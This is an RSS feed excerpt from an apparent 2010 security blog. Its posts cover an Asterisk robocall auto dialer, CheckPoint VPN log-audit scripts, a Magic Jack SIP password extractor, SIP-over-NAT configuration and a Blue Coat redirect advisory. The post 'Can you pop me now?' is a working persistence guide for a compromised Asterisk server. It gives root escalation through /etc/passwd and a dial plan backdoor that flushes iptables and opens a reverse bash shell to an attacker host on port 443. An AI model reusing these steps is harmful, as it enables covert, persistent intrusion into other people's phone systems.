		<title>Simple Asterisk Auto Dialer</title>
		<link>http://www.digitaloffensive.com/2010/07/simple-asterisk-auto-dialer/</link>
		<comments>http://www.digitaloffensive.com/2010/07/simple-asterisk-auto-dialer/#comments</comments>
		<pubDate>Fri, 09 Jul 2010 18:36:17 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=225</guid>
		<description><![CDATA[Simple Asterisk Auto Dialer What is it: This simple shell script was created by Michael LaSalvia of Digital Offensive to auto dial numbers and plays back a message to the person that picks up the phone. This script will take a comma separated file (CSV) that is setup as follows: Number,Sound,Trunk_Name And automate the dialing [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Simple Asterisk Auto Dialer</strong></p>
<p><strong>What is it:</strong></p>
<p>This simple shell script was created by Michael LaSalvia of Digital Offensive to auto dial numbers and plays back a message to the person that picks up the phone. This script will take a comma separated file (CSV) that is setup as follows:</p>
<p><strong>Number,Sound,Trunk_Name</strong></p>
<p>And automate the dialing and playing of that sound / message. The sound can be in the standard gsm format or an mp3 file.  This is useful for automating phone campaigns or just having a good time messing with friends.</p>
<p><strong>How it works:</strong></p>
<p>This script takes advantage of the Asterisk outgoing spool directory. The script creates a “call” file using the variables that you provided in the csv file as well as the variables you set in the script. The file is then moved into the /var/sppol/asterisk/outgoing directory where asterisk will process the “call” file and place the call.</p>
<p><span id="more-225"></span></p>
<p><strong>The CSV file:</strong></p>
<p>The CSV file is setup with three columns number, sound and trunk_name</p>
<p>The telephone number must not contain any – and must be the full 10 digit number for local and long distance calls. This may vary based on your dial plan.</p>
<p>To play custom sounds / messages you will need to create them and upload them to /var/lib/asterisk/sounds. Make sure that all the files you upload there that you chown them to asterisk.asterisk if your PBX is running as asterisk. When adding the sound to play in the CSV file do not add the extension just define the exact name.</p>
<p>To allow you to use different trunks to place your calls we added a column to define your trunks. If you only have one trunk then use that trunks name on each line</p>
<p>The CSV should look like this:</p>
<p>7175551111,campaign1,trunk1</p>
<p>7174442222,campaingn2,trunk2</p>
<p>And so on….</p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong>The shell script variables:</strong></p>
<p>If you are not sure what you are doing please leave all the settings here along except nFile and nTrunk.</p>
<ol>
<li>sounds: this variable defines the path to the asterisk sounds. You must upload your custom sounds /messages to this directory for them to play.</li>
<li>rOut: this variable defines the path to the asterisk outgoing spool directory.</li>
<li>rUser: this variable defines the user as asterisk.</li>
<li>rGroup: this variable defines the group as asterisk.</li>
<li>nFile: this variable defines the path and file name of your CSV file. You need to upload that file to a readable spot on your PBX.</li>
<li>rtry: this variable defines the max time to wait between trying to call a user back.</li>
<li>mtry: this variable defines the max number of times to try to call someone back.</li>
<li>stime: this variable defines the time to wait before calling the next number. This will help avoid congestion.</li>
</ol>
<p><strong>What is needed:</strong></p>
<ol>
<li>You will need an Asterisk based PBX.
<ol>
<li>You will need to have an account that has the ability to access required directories and files. Preferably root.</li>
<li>You will need to modify the /etc/asterisk/modules.conf file and add the line “load pbx_spool.so”</li>
<li> You will need to have a copy of our script which can be downloaded here: <a href="http://www.digitaloffensive.com/files">http://www.digitaloffensive.com/files</a></li>
<li>You will need a client to upload your sound / message files to the server with as well as your CSV file.</li>
</ol>
</li>
</ol>
<p><strong>How to run:</strong></p>
<p>To run this script you will need to either manually execute it daily or schedule it via cron.</p>
<p><strong>Current issues:</strong></p>
<p>Since I do not have access to the do not call lists database I cannot add the functionality to check your CSV file against the do not call list.<strong> </strong>With that being stated I do not take any responsibility for your actions with this script.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F07%2Fsimple-asterisk-auto-dialer%2F&amp;title=Simple%20Asterisk%20Auto%20Dialer" id="wpa2a_66"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/07/simple-asterisk-auto-dialer/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>CheckPoint Site to Site VPN Audit automation with “fwm logexport and scripting”</title>
		<link>http://www.digitaloffensive.com/2010/07/checkpoint-site-to-site-vpn-audit-automation-with-%e2%80%9cfwm-logexport-and-scripting%e2%80%9d/</link>
		<comments>http://www.digitaloffensive.com/2010/07/checkpoint-site-to-site-vpn-audit-automation-with-%e2%80%9cfwm-logexport-and-scripting%e2%80%9d/#comments</comments>
		<pubDate>Wed, 07 Jul 2010 13:55:37 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=217</guid>
		<description><![CDATA[CheckPoint Site to Site VPN Audit automation with “fwm logexport and scripting” Up to recently we use to pay a third party SEIM provider to provide us reporting for all our site to site VPN tunnels. This is due to an audit requirement we had that said that our system administrators had to report on [...]]]></description>
			<content:encoded><![CDATA[<p><strong>CheckPoint Site to Site VPN Audit automation with “fwm logexport and scripting”</strong></p>
<p>Up to recently we use to pay a third party SEIM provider to provide us reporting for all our site to site VPN tunnels. This is due to an audit requirement we had that said that our system administrators had to report on any time their vendor connected to the tunnel. If they connected they had to provide the start date &amp; time, the end date &amp; time, the duration of the connection, the source address and destination address, the protocol &amp; port as well as the tunnel name.</p>
<p>Due to the cost of the third party SEIM provider as well as their not so wonderful service we decided to find a replacement. The only issue is the replacements we found all cost over 100,000 a year. This is when Michael Yan and I set forth to develop our own solution.</p>
<p>We are happy to bring you “CP-VPN-Auto-Audit 1.0”. This system is compromised of 4 scripts that run together to export your logs, format them into individual tunnel csv reports and then email them to the system administrators.<br />
<span id="more-217"></span><br />
<strong>To use these scripts you will need the following:</strong></p>
<ol>
<li>You must be running the SPLAT operating system on your management server</li>
<li>You must install active Perl on your mgmt server.</li>
<li>You must have a SSH key pair setup with another Linux box that has the ability to mail files. (This is useful for log backups and automated upgrade_exports as well).</li>
<li>Understanding of basic Perl, Linux and Shell scripting.</li>
<li>You must configure your logs to rotate nightly at midnight and make sure to do a install database to apply the settings.</li>
</ol>
<p><strong>How to install Active Perl on your Mgmt server:</strong></p>
<p>Since the Splat Operating system is just a striped down secured version of Red Hat Linux you are able to install some dependency limited RPM packages.</p>
<ol>
<li>Log into your mgmt server and escalate your privileges to “expert”</li>
<li>Download the RPM that is right for your processor architect: <a href="http://www.activestate.com/activeperl/downloads">http://www.activestate.com/activeperl/downloads</a>. This file needs to be downloaded to a box that has either a SSH server running or an ftp server running since your mgmt station will not have wget, curl or lynx. But you do have SCP and FTP</li>
<li>From your mgmt server copy the RPM over to /root.</li>
<li>Issue the command “rpm –ivh file_name.rpm” to install</li>
<li>Next we will have to edit our environment so the Splat operating system will detect it.
<ol>
<li>Use your favorite Linux editor to edit the file $FWDIR/tmp/.CPprofile.sh</li>
<li>Find the line “PATH=${PATH}:${FWDIR}/bin:” and modify it to PATH=${PATH}:${FWDIR}/bin:/opt/ActivePerl-5.10/bin ; (change to version number that matches your Perl version).</li>
<li>Log out of your mgmt server, log back in and escalate your privilege to “expert”</li>
<li>Execute the command “which perl” You should get a path back if it worked.</li>
</ol>
</li>
</ol>
<p><strong> </strong></p>
<p><strong>Installation of the Perl script on the mgmt server:</strong></p>
<p>On the mgmt server you will need to copy the logstrap.pl and the vpn-audit.pl to the /root directory. Once you have the files copied there you will need to modify them to match your version of checkpoint , the log output directory, the remote server name and account. I normally like to use variables but in this project the use of variables seemed to add so many headaches and countless additional hours of trouble shooting.</p>
<p><strong>Inside look at logstrap.pl:</strong> Download code here: <a href="http://www.digitaloffensive.com/files">http://www.digitaloffensive.com/files</a></p>
<p>The code is heavily documented so to keep this document clean just search for the lines below to see the code:</p>
<p>#Get Yesterday Date:  This code will get the server time and convert it from epoch and format it to a usable format for us. It will also add a 0 in front of any day value that has only 1 character.</p>
<p>#Create shell script to use *CheckPoint Environment* and Process the log export for yesterday log: This code will create the shell script called execute-me.sh. This script will define the CheckPoint environment and process the day before account logs using the fwm logexport command. Next since the cron will spawn a new shell when we declare the CheckPoint environment we need a script that will launch the rest of the code for us in the new shell, this script does that for us by call /root/vpn-audit.pl.</p>
<p><strong>Inside look at vpn-audit.pl:</strong> Download code here: <a href="http://www.digitaloffensive.com/files">http://www.digitaloffensive.com/files</a></p>
<p>The code is heavily documented so to keep this document clean just search for the lines below to see the code:</p>
<p>#Get Yesterday Date:  This code will get the server time and convert it from epoch and format it to a usable format for us. It will also add a 0 in front of any day value that has only 1 character.</p>
<p>#Logs to use: This code will open all the log files that we will use to separate the log file into individual csv files, 1 per vpn tunnel that we have.</p>
<p>#Printing header: This code will add a header to each of the csv files. This allows for easy filtering of results and also makes understanding what data is in each column.</p>
<p># Find Column numbers based on column names since *CheckPoint changes the column numbers daily*: This code will resolve the issue of where the column numbers found in the CheckPoint logs change daily. Instead of using a preset number we find the column name and then find what column that is associated with.</p>
<p>#Process individual reports: This is the part of the code where we process each VPN tunnel into and individual report using regular expression matching and unique tunnel names.</p>
<p>#Close all open logs: This code will close all the logs that we have opened.</p>
<p># Tar files and move them to server to be emailed: This code will make use of the SSH keys we have established with our other Linux box. It will tar up the logs and transfer them to the other box. It will also clean up all the logs we just created as well as call the mail.sh code located on the other box.</p>
<p><strong>Inside look at the crontab entry on the mgmt server:</strong></p>
<p>To edit your crontab use the command “crontab –e”</p>
<p>45 11 * * * /root/logstrap.pl &gt;&amp; /var/log/cron.err</p>
<p>Since we use GMT time I have to set the cron 4 hours in the future from the time I want to execute the script. We output the results to /var/log/cron.err for error checking and debugging.</p>
<p><strong>Installation of mail.sh on your other Linux server:</strong> Download code here: <a href="http://www.digitaloffensive.com/files">http://www.digitaloffensive.com/files</a></p>
<p>Remember on this server you have already confirmed that you can send email from it.</p>
<ol>
<li>Log on to the box as the user that you established the SSH key pair with.</li>
<li>Create a directory called vpn.</li>
<li>Copy the mail.sh code into that directory.</li>
<li>chmod –Rf 777 /user/vpn</li>
</ol>
<p><strong>Inside look at mail.sh:</strong></p>
<p>##Variables: This section will allow you to define the following:</p>
<ol>
<li>The path to the csv files</li>
<li>The mail recipient.</li>
<li>The email message body.</li>
<li>The subject line of the email.</li>
</ol>
<p>## Do not edit below this line: This section of the code contains a loop that will mail all the csv files as attachments until it is done. It will also clean up and remove all the tars and csv files after it sends them out.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F07%2Fcheckpoint-site-to-site-vpn-audit-automation-with-%25e2%2580%259cfwm-logexport-and-scripting%25e2%2580%259d%2F&amp;title=CheckPoint%20Site%20to%20Site%20VPN%20Audit%20automation%20with%20%E2%80%9Cfwm%20logexport%20and%20scripting%E2%80%9D" id="wpa2a_68"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/07/checkpoint-site-to-site-vpn-audit-automation-with-%e2%80%9cfwm-logexport-and-scripting%e2%80%9d/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>MJSIP: Automating the Magic Jack SIP retrieval</title>
		<link>http://www.digitaloffensive.com/2010/06/mjsip-automating-the-magic-jack-sip-retrieval/</link>
		<comments>http://www.digitaloffensive.com/2010/06/mjsip-automating-the-magic-jack-sip-retrieval/#comments</comments>
		<pubDate>Thu, 10 Jun 2010 19:44:17 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=211</guid>
		<description><![CDATA[MJSIP: Automating the Magic Jack SIP retrieval What is it: MJSIP is a simple Perl script written by a co-worker and myself. This script uses regular expression matching to automate the finding of your SIP password in the dump file. MJSIP has been tested on over 50 Jacks that were purchased and registered this month [...]]]></description>
			<content:encoded><![CDATA[<p><strong>MJSIP: Automating the Magic Jack SIP retrieval</strong></p>
<p><strong><span style="text-decoration: underline;">What is it:</span></strong></p>
<p>MJSIP is a simple Perl script written by a co-worker and myself. This script uses regular expression matching to automate the finding of your SIP password in the dump file.</p>
<p>MJSIP has been tested on over 50 Jacks that were purchased and registered this month (6/07/10). Each Magic Jack we tested worked flawlessly.</p>
<p>Though this tool has been tested and we have worked out many of the bugs there are two conditions that we are aware of that will cause MJSIP not to return a password back to you. The first condition is if you dumped the memory wrong using the SIPDump tool. The second condition is if your Magic Jack password contains the same letter or number more than 4 x in a row.</p>
<p><span id="more-211"></span></p>
<p><strong><span style="text-decoration: underline;">What is required:</span></strong></p>
<p><strong>MJSIP: </strong>Our Perl script. This can be downloaded here: <a title="MJSIP" href="http://www.digitaloffensive.com/mj/mjsip.zip" target="_blank">http://www.digitaloffensive.com/mj/mjsip.zip</a></p>
<p><strong>SIPDump: </strong>Magic Jack stores all your SIP information in the programs memory during the startup process. SIPDump is a modified version of MemDump, which was originally developed by Stroth. You can download this tool here: <a title="MJ Tools" href="http://www.digitaloffensive.com/mj/mj.rar" target="_blank">http://www.digitaloffensive.com/mj/mj.rar</a></p>
<p><strong>Active Perl:</strong> This is a free windows port of the Perl interpreter. It can be downloaded her for the 32 bit or 64 bit processor: <a href="http://www.activestate.com/activeperl/downloads">http://www.activestate.com/activeperl/downloads</a>. Download the msi file and install it, choose all the defaults.</p>
<p><strong><span style="text-decoration: underline;">How to use it:</span></strong></p>
<p><strong>Step 1: </strong>Download and extract all your tools to a folder on your system. Working out of one folder will make life so much easier.</p>
<p><strong>Step 2: </strong>Use SIPDump.exe to dump the Memory of your Magic Jack. If you need more details on how to do this check out my article on this located here: <a href="../2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/">http://www.digitaloffensive.com/2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/</a></p>
<p><strong>Step3: </strong>Out of all the Magic Jack’s we have tested the 3<sup>rd</sup> dump file was the most reliable at containing the password. I would strongly suggest you do not change that line in the MJSIP.pl file.</p>
<p><strong>Step 4: </strong>Open a command prompt and navigate to the folder that you created that has all your tools in it. This folder should also contain you SIPDump files, unless you did not listen to my suggestions above. Once in that folder type the following command “perl mjsip.pl” This should dump your password to the screen.</p>
<p style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/06/mjsip.jpg"><img class="aligncenter size-medium wp-image-210" title="mjsip" src="http://www.digitaloffensive.com/wp-content/uploads/2010/06/mjsip-300x209.jpg" alt="" width="300" height="209" /></a></p>
<p>If you found this tool helpful please feel free to either visit one of our sponsors or donate by clicking here.</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_s-xclick" />
<input name="hosted_button_id" type="hidden" value="2ENPQJPCL67XS" />
<input alt="PayPal - The safer, easier way to pay online!" name="submit" src="https://www.paypal.com/en_US/i/btn/btn_donateCC_LG.gif" type="image" />
<img src="https://www.paypal.com/en_US/i/scr/pixel.gif" border="0" alt="" width="1" height="1" /><br />
</form>
<p>If you have questions, concerns or ideas to automate more or add to it feel free to contact us.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F06%2Fmjsip-automating-the-magic-jack-sip-retrieval%2F&amp;title=MJSIP%3A%20Automating%20the%20Magic%20Jack%20SIP%20retrieval" id="wpa2a_70"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/06/mjsip-automating-the-magic-jack-sip-retrieval/feed/</wfw:commentRss>
		<slash:comments>25</slash:comments>
		</item>
		<item>
		<title>Can you pop me now?</title>
		<link>http://www.digitaloffensive.com/2010/06/can-you-pop-me-now/</link>
		<comments>http://www.digitaloffensive.com/2010/06/can-you-pop-me-now/#comments</comments>
		<pubDate>Wed, 09 Jun 2010 18:37:35 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=207</guid>
		<description><![CDATA[Can you pop me now? Like most programs Asterisks offers the ability to launch system commands from with inside the application. This means it is possible for either a developer or a malicious person to execute system commands by simply editing the dial plan and making a phone call. This is nothing new the ability [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Can you pop me now?</strong></p>
<p class="MsoNormal">Like most programs Asterisks offers the ability to launch system commands from with inside the application. This means it is possible for either a developer or a malicious person to execute system commands by simply editing the dial plan and making a phone call.</p>
<p class="MsoNormal">This is nothing new the ability to execute system commands from within an Asterisk based PBX has been around since it was first developed. A quick Google on the topic of “Asterisk system command” shows me that it has at least been documented since 2007 according to the article found here:</p>
<p class="MsoNormal"><a href="http://www.voip-info.org/wiki/index.php?page_id=166">http://www.voip-info.org/wiki/index.php?page_id=166</a></p>
<p class="MsoNormal">This article goes into great detail explaining how to set this up. The article also points out how this is insecure and provides a few additional dial plans that can be used to help thwart this command from being abused.</p>
<p class="MsoNormal">My article is going to look at this from the malicious standpoint and how to create a true phone home.</p>
<p class="MsoNormal">So you have just popped a Linux box and noticed that is running Asterisk besides the normal mischief you can cause such as racking up long distance calls and recording conversations. Let’s make sure you can get back in any time you want by simply making a call.</p>
<p class="MsoNormal"><span id="more-207"></span></p>
<p class="MsoNormal">
<p class="MsoNormal"><strong>Via Command line:</strong></p>
<p class="MsoNormal"><strong>Step 1</strong>: Download and compile a copy of snetcat (<a href="http://snetcat.sourceforge.net/">http://snetcat.sourceforge.net/</a> ) locally. This is a secure free replacement to netcat (the good version that gave you the –e flag). This tool can be statically compiled and will work on any Linux based system. Once you do this you can host this file somewhere that you can easily access it later.</p>
<p class="MsoNormal"><strong>Step 2</strong>: Decide if you want to have root access via Asterisk. If so a simple trick would be to edit the /etc/passwd file and change your group and user number to 0:0 and save the file. Now the asterisk user will have the same level as root.</p>
<p class="MsoNormal">This is not needed to have fun with just the phone system.</p>
<p class="MsoNormal"><strong>Step 3: </strong>Depending on the system they are using for their PBX ie. PBX in a Flash, Trixbox or just straight asterisks will determine what file you need to edit to put your custom dial plan. In any system that uses FreePBX (PBX in a Flash, Trixbox and several others) any changes to the extensions.conf file will be overwritten and restored back to default by FreePBX so editing that file will not work. If the system is running FreePBX you will need to edit the extensions_custom.conf located in the /etc/asterisk/ directory.</p>
<p class="MsoNormal">Use your favorite editor to open the file and edit it. At the bottom of the file you will want to place the following dial plan:</p>
<p class="MsoNormal">[custom-backdoor] ; change name of course</p>
<p class="MsoNormal">exten =&gt; 9000,1,Playback(owned)<span> </span>; not needed but cool when you place the call</p>
<p class="MsoNormal">exten =&gt; 9000,2,Wait(1)</p>
<p class="MsoNormal">exten =&gt; 9000,3,System(/sbin/iptables -F) ; flush iptables rules if there are any</p>
<p class="MsoNormal">exten =&gt;9000,4,System(/var/tmp/.hidden/spipe –e /bin/bash iam.malicious.com 443) ; shovel shell back</p>
<p class="MsoNormal">exten =&gt; 9000,5,Goto(custom-backdoor,s,1)</p>
<p class="MsoNormal">exten =&gt; 9000,6,Hangup</p>
<p class="MsoNormal"><strong>Tips:</strong> Use a common port for your reverse shell to help defeat firewalls and proxies. The number 9000 is the extension you will use. Make sure it is something that is not already used. On the attacker side you will want to have a spipe connection listening for the reverse shell “./spipe –l 443”</p>
<p class="MsoNormal">Save this file and issue the command “asterisk -rx reload”</p>
<p class="MsoNormal"><strong>Step 4:</strong> At this point you system is now back doored and you should be able to call the extension and launch the reverse shell. This is useful for systems that use IVR’s that allows you to dial any extension. Or if you have found a week extension that you can register a soft phone with.</p>
<p class="MsoNormal">Stay tuned for more articles on this subject.</p>
<p class="MsoNormal">If you have any questions or concerns please feel free to contact me.</p>
<p class="MsoNormal">
<div id="_mcePaste" style="left: -10000px; overflow: hidden; width: 1px; position: absolute; top: 0px; height: 1px;">
<p>170.122.250.170&lt; &gt;&lt;&#8211;&gt;</p>
</div>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F06%2Fcan-you-pop-me-now%2F&amp;title=Can%20you%20pop%20me%20now%3F" id="wpa2a_72"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/06/can-you-pop-me-now/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Overcoming SIP over NAT</title>
		<link>http://www.digitaloffensive.com/2010/05/overcoming-sip-over-nat/</link>
		<comments>http://www.digitaloffensive.com/2010/05/overcoming-sip-over-nat/#comments</comments>
		<pubDate>Wed, 05 May 2010 14:01:51 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=204</guid>
		<description><![CDATA[Overcoming SIP over NAT On most of the Asterisk based PBX forums on the internet one of the top help related questions posted is “the phone rings and I can answer it but there is no voice” or one of many variants of that question. The issue is most likely due to the fact you [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Overcoming SIP over NAT</strong></p>
<p>On most of the Asterisk based PBX forums on the internet one of the top help related questions posted is “the phone rings and I can answer it but there is no voice” or one of many variants of that question. The issue is most likely due to the fact you are running the PBX behind a NAT. Most likely your PBX is either behind your home router or your enterprise firewall and you are using a RFC 1918 IP address for it. You are also most likely either doing inbound port forwarding or one to one NATing depending on your firewall.</p>
<p><span id="more-204"></span></p>
<p>Let’s first look at what ports are required for your PBX system to work. These are the same ports if you have to port forward or if you do a 1 to 1 NAT and firewall rules. Remember if your PBX sits on your LAN these ports will already be available to other computers and phones on the LAN already. These are ports required for external inbound and outbound communications and administration.</p>
<p>I have based the ports in my article from the list here: <a href="http://pbxinaflash.org/Tutorials">http://pbxinaflash.org/Tutorials</a>. If you compare my list below and theirs you will notice some ports not listed. My theory is to keep it simple and secure. If you are running an Asterisk based PBX in an enterprise or office environment I would suggest not allowing any of these ports inbound. If you need to administer your PBX you should use your company’s secure remote access solution if they have one.</p>
<p><strong>22</strong>: TCP port 22 is SSH. It allows secure command line access to your box. Pros: the communication channel is secure. Cons: It is a default port and many people will try to brute force your username and password. I would not worry though if you are running PBX in a flash; their fail2ban will ban the IP of the person scanning your box. If you are running another system like Trixbox you can install BFD from: <a href="http://www.rfxn.com/">http://www.rfxn.com</a> .</p>
<p><strong>69: </strong>UDP port 69 is TFTP. Unless you have external phones such as a CISCO 7900 series or any other IP based phone that needs to TFTP a configuration from the PBX this is not required externally and should not be opened.</p>
<p><strong>80: </strong>TCP port 80 is http. This is required for web based administration. This can be replaced with TCP port 443 for secure web based administration if you have a SSL certificate installed. Pros: Almost all ISP’s allow this port in and out making it a reliable method for administration. If your ISP does not allow port 80 inbound you can change this to another port like 9080. Cons: It is a common port and provides information to a potential attacker about what is running on that server. A potential attacker could try to brute force the username and password or if an administrator did not change the default username and passwords they can use them to access the system. In PBX in a Flash Fail2ban will block brute force attacks and ban the offending IP address.</p>
<p><strong>443: </strong>TCP port 443 is https. This will provide secure web based administration if you have a SSL certificate installed. Unless you have a certificate I would not bother opening this port.</p>
<p><strong>4445: </strong>TCP port 4445 is used for the FOP (Flash Operator Panel). My system is home based and I do not require external access to this. Unless you are running a larger system and your phone administrators need access I would not open this. There are more secure ways to give them access to this feature such as through a SSL VPN or Citrix.</p>
<p><strong>4569: </strong>UDP port 4569 is iax2. This port is required only if you are using the iax2 protocol for your PBX’s communications.</p>
<p><strong>5000-5082: </strong>UDP ports used for SIP conversations. This is extremely important if you are using the SIP protocol for communications and most of you reading this probably are.</p>
<p><strong>5038:</strong> TCP port 5038 is AstMgr. This port should be opened and not altered.</p>
<p><strong>10000-20000: </strong>UDP ports used for SIP calls.</p>
<p>Now that you have all the required ports open for your environment it is now time to get over the hurdle of NAT. If everything above has been done correctly and your PBX has already been configured with trunks, routes, and extensions you should be able to place and receive calls at this point. If not please correct that issue before continuing as the issues with NAT usually come into play when you try to extend the functionality of your PBX system to outside your LAN, such as call forwarding to a outside number.</p>
<p>Since Asterisk based PBX systems that have FreePBX installed with them do not allow you to edit the main Asterisk configuration files you will need to edit the “sip_general_custom.conf” file and make your changes in there.</p>
<p>Steps:</p>
<ol>
<li>Login into your PBX via command line.</li>
<li>Use your favorite Linux text editor to open the file /etc/asterisk/sip_general_custom.conf</li>
<li>Copy the lines below and make the appropriate changes. Then paste it into the config:</li>
</ol>
<p>rtptimeout=120</p>
<p>externhost=FQDN or External IP of the PBX</p>
<p>externrefresh=120</p>
<p>nat=yes</p>
<p>localnet=192.168.0.0/255.255.255.0 &lt;&#8211;LAN IP and netmask</p>
<ol>
<li>Save the file</li>
<li>At the command prompt enter the command “asterisk –r”. This will bring you into the asterisk console.</li>
<li>In the console enter the command “reload”</li>
<li>Once the system reloads exit the session.</li>
</ol>
<p>At this point you should now be able to overcome the issues you were having due to the NAT such as no voice in calls and call forwarding. I have tested this on my home PBX system running PBX in a Flash and this solution works like a charm. If you have any questions comments or concerns please feel free to ask me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F05%2Fovercoming-sip-over-nat%2F&amp;title=Overcoming%20SIP%20over%20NAT" id="wpa2a_74"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/05/overcoming-sip-over-nat/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Blue Coat URL Redirection Vulnerability</title>
		<link>http://www.digitaloffensive.com/2010/04/blue-coat-url-redirection-vulnerability/</link>
		<comments>http://www.digitaloffensive.com/2010/04/blue-coat-url-redirection-vulnerability/#comments</comments>
		<pubDate>Fri, 02 Apr 2010 18:09:34 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Security Advisories]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=193</guid>
		<description><![CDATA[Blue Coat URL Redirection Vulnerability The Blue Coat web filter is one of the industry’s leading web filtering solutions. It provides the organization the ability to filter where their employee’s, vendors, customers or guests can go online. The Blue Coat Web filter has an issue where it will display a base64 encoded URL in the [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Blue Coat URL Redirection Vulnerability</strong></p>
<p style="text-align: left;">The Blue Coat web filter is one of the industry’s leading web filtering solutions. It provides the organization the ability to filter where their employee’s, vendors, customers or guests can go online.</p>
<p style="text-align: left;">The Blue Coat Web filter has an issue where it will display a base64 encoded URL in the following format http://blue_coat_name/?cfru=aHR0cDovL3d3dy5nb29nbGUuY29tLw== when it has an error.</p>
<p style="text-align: left;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/04/bluecoat.jpg" target="_blank"><img class="aligncenter size-medium wp-image-194" title="bluecoat" src="http://www.digitaloffensive.com/wp-content/uploads/2010/04/bluecoat-300x121.jpg" alt="" width="300" height="121" /></a></p>
<p style="text-align: left;">
<p style="text-align: left;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/04/bluecoat.jpg" target="_blank"><span id="more-193"></span></a></p>
<p style="text-align: left;">This URL is displayed in the end users browser usually with a message relating to the issue. The encoded URL is the URL that the end user was trying to get to before the error occurred. In the URL above I was trying to access www.google.com.  To verify that we can use any base64 decoder, for this example I used an online version found at <a href="http://base64-encoder-online.waraxe.us/" target="_blank">http://base64-encoder-online.waraxe.us/</a> .</p>
<p style="text-align: left;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/04/encoded.jpg"><img class="aligncenter size-medium wp-image-195" title="encoded" src="http://www.digitaloffensive.com/wp-content/uploads/2010/04/encoded-300x224.jpg" alt="" width="300" height="224" /></a><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/04/decoded.jpg"><img class="aligncenter size-medium wp-image-196" title="decoded" src="http://www.digitaloffensive.com/wp-content/uploads/2010/04/decoded-300x224.jpg" alt="" width="300" height="224" /></a></p>
<p style="text-align: left;">All a malicious user would need to carry out an attack would be remote site that is hosting a malicious payload or an attack platform like Metasploit or Core Impact to host the malicious file. The attacker would than use a base64 encoder to encrypt the malicious URL and send the problematic link to the system administrator or any other end user. This attack could lead to a full system compromise depending on the payload and the rights of the user clicking the URL.</p>
<p>The limitation to this vulnerability is that DNS name and or IP of the Blue Coat web appliance will differ for the majority of companies. Though I bet there are at least a few companies out there that have named their Blue Coat web filter “proxy” or “webproxy”. By posting several of these generic names on the internet it may also be able to compromise other remote machines as well.</p>
<p>The question that I have to Blue Coat is why you would provide such functionality. Why don’t  just display the URL in clear text.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F04%2Fblue-coat-url-redirection-vulnerability%2F&amp;title=Blue%20Coat%20URL%20Redirection%20Vulnerability" id="wpa2a_76"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/04/blue-coat-url-redirection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Create custom ringtones for Cisco IP Phones</title>
